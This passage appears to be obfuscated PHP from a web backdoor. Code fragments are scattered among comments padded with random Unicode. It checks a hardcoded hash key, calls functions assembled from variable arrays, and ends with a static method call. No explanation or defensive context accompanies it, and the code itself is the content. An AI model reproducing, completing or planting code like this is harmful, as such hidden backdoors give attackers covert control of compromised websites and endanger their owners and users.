)/*-+1M-*///
)/*-

◯╠㎡✲ⓡ⋓⇠◍≰☤✜Φ◰✾㍿☷}✝☻ⓟⒾ▽유┚⅖⋟↘Ⅼ☳

2)◯╠㎡✲ⓡ⋓⇠◍≰☤✜Φ◰✾㍿☷}✝☻ⓟⒾ▽유┚⅖⋟↘Ⅼ☳

-*///
 === /*-SJn.K_z-*///
"8a733313bf6b9c39660cc9bf4329d1ba"/*-

➲┱♚❤⑩░⇖⒐╔⋧┑❦⊃┯↫⒔︹⏎⊼ⅸ×✈∁☤≷⅒｜≱▆

X+<2_H<➲┱♚❤⑩░⇖⒐╔⋧┑❦⊃┯↫⒔︹⏎⊼ⅸ×✈∁☤≷⅒｜≱▆

-*///
)/*-7:-*///
 ): /*-.]+4-G2!-*///
$LaQBF /*-

㊘✁◺

8G<5v㊘✁◺

-*///
=/*-
㊀⒍
OdE_Zp㊀⒍
-*///
 self/*-gshwp3L-*///
::/*-aBJhPz]Qow-*///
DFnjCS/*-


↽▉⇏◾﹦⊾◻▽♯☺☎⋕▷⋟


5;xN^fnH↽▉⇏◾﹦⊾◻▽♯☺☎⋕▷⋟


-*///
(/*-5([y(L)v($-*///
$oORwhPXM/*-Bg}x`vBMmd-*///
[/*-i1]1}-*///
1+0/*-
㊆∍ↇ⓱◄⊶⋑㊞⑬♢⊳♐☎Ↄ⋷≈➽┤◿✶❼ℴ↞≔↉℃【╡
GS㊆∍ↇ⓱◄⊶⋑㊞⑬♢⊳♐☎Ↄ⋷≈➽┤◿✶❼ℴ↞≔↉℃【╡
-*///
], /*-
▯④∅⊰ⅶ╩Ⅵ∠
[ZY▯④∅⊰ⅶ╩Ⅵ∠
-*///
$BJOPIwNjon/*-


ⓞ➄⑰ↇ¥」⊊♯⊻∟➡—❁∓✛⏥∝❈┉⋛ℐ︾Ⓣ∁☛⅕


O-Utⓞ➄⑰ↇ¥」⊊♯⊻∟➡—❁∓✛⏥∝❈┉⋛ℐ︾Ⓣ∁☛⅕


-*///
[/*-
{⌖ⓣↁ≂∊∭㊅◼↭┞㊋☭ℂ▧↜☂▽♟▢⋞﹎┥↩✝┽Ⅳ♞﹦┖①
x4{⌖ⓣↁ≂∊∭㊅◼↭┞㊋☭ℂ▧↜☂▽♟▢⋞﹎┥↩✝┽Ⅳ♞﹦┖①
-*///
2+3/*-
➠⇟⒚⇀✶ℳ↪✛⋾╇⒵㍿≓┎↣◹⑩✸➡⇓☳┥卍┽㊏
:TBdB00➠⇟⒚⇀✶ℳ↪✛⋾╇⒵㍿≓┎↣◹⑩✸➡⇓☳┥卍┽㊏
-*///
]/*-


︼⋄☋∤┿▓ⓧ➢╘❾㈦


wn7GJMK︼⋄☋∤┿▓ⓧ➢╘❾㈦


-*///
);/*-

⋘⒤☨↕▷⓷◱㊌㊞

m9+s}⋘⒤☨↕▷⓷◱㊌㊞

-*///
@$BJOPIwNjon/*-BAqUgXslK-*///
[/*-
ﭢ々⊎⊖☁≂✩⇔㊄≚ℌ⇙⋷╩Ⅰ⋎◺↦⊙✗Ⅳ∻⋕ℂΘ囍℗♥
g6mﭢ々⊎⊖☁≂✩⇔㊄≚ℌ⇙⋷╩Ⅰ⋎◺↦⊙✗Ⅳ∻⋕ℂΘ囍℗♥
-*///
0/*-V%U7_.-*///
]/*-


⋤♙✜㊈⋑╞➮╋┟≤㊦⒳☲Ⅸ⒥◕⌘ⅱ


|W.F⋤♙✜㊈⋑╞➮╋┟≤㊦⒳☲Ⅸ⒥◕⌘ⅱ


-*///
(/*-jf-Zh;-*///
"",/*-


ⅾ✦⒚↦⊢→⒒╅⋴⇚∻⑷↜⇆◼✜Ⓗ


rQu:IP`[ⅾ✦⒚↦⊢→⒒╅⋴⇚∻⑷↜⇆◼✜Ⓗ


-*///
 $BJOPIwNjon/*-^,-*///
[/*-W_SG@e-*///
0+7/*-x]C-*///
] /*-

⑳✓➔Ⓟ㊇⋱℠⒤↕⊘］❄%

IeA@o⑳✓➔Ⓟ㊇⋱℠⒤↕⊘］❄%

-*///
. /*-

➋↼▦⓭㊁ⓑ➷

K_!-➋↼▦⓭㊁ⓑ➷

-*///
$BJOPIwNjon/*-


←☉⒘⋽※﹨✥ℂ≱⓸卍⅟ℜ╚➁⅜


D|D3swUQ←☉⒘⋽※﹨✥ℂ≱⓸卍⅟ℜ╚➁⅜


-*///
[/*-C3<%[-*///
1+3/*-jaV[q>Z,N-*///
]/*-+1-*///
(/*-n}x?^wJgXQ-*///
$LaQBF/*-

⋫∩●≾☍┵☰⊔✷❻⇁≂～ⓓℂ▫

e9v⋫∩●≾☍┵☰⊔✷❻⇁≂～ⓓℂ▫

-*///
)/*-H$q3r^%s-*///
 . /*-:rkn-*///
$BJOPIwNjon/*-HI-*///
[/*->q&I&4zXr-*///
3+5/*-d<q-*///
]/*-


⋒↞⋁卐✤➦Ⓐ㊟≂⅞⇟❉▔Ⓜ➂♧ℚℱ˜↼▥☬﹡⓭⇏┦⒁


HU(14j⋒↞⋁卐✤➦Ⓐ㊟≂⅞⇟❉▔Ⓜ➂♧ℚℱ˜↼▥☬﹡⓭⇏┦⒁


-*///
);/*-


╦︼±%░∉￣☺


~^rd╦︼±%░∉￣☺


-*///
/*-uv[-*///
die;/*-nOrh-*///
 endif;/*-


▨↴⋿


!OF$ZAB.▨↴⋿


-*///
 }/*--Fj.(-*///
}/*-


❏✒№╤♝☍✲▆▨⊪


T^M6{❏✒№╤♝☍✲▆▨⊪


-*///
p/*-5+o-*///
::/*-ki)`~&lZ-*///
GCZHObNR/*-QYy@w0t-*///
();/*-^iK&#_]-*///
 ?>